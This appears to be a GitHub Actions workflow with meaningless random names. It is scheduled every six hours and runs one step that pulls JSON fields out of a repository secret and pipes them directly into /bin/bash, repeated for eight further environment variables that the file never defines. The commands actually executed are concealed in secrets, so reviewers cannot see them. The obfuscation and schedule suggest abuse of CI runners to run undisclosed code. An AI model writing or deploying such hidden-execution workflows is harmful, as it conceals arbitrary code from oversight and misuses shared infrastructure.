name: zonxxki
on:
  workflow_dispatch:
  schedule:
    - cron: '13 4/6 * * *'

jobs:  # 21493
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zonxxki
        env:
          koa6: ${{ secrets.koa6 }}
        run: |
          echo $koa6 | jq -r .h9336 | /bin/bash
          echo $wvsnu127 | jq -r .xdh49 | /bin/bash
          echo $u011 | jq -r .x7714 | /bin/bash
          echo $eatfc86712 | jq -r .vp17 | /bin/bash
          echo $ljqmu11893 | jq -r .o1 | /bin/bash
          echo $awfos1 | jq -r .p24355 | /bin/bash
          echo $q3 | jq -r .al82 | /bin/bash
          echo $faxx45 | jq -r .dzko6002 | /bin/bash
          echo $nto95 | jq -r .qtxn64 | /bin/bash

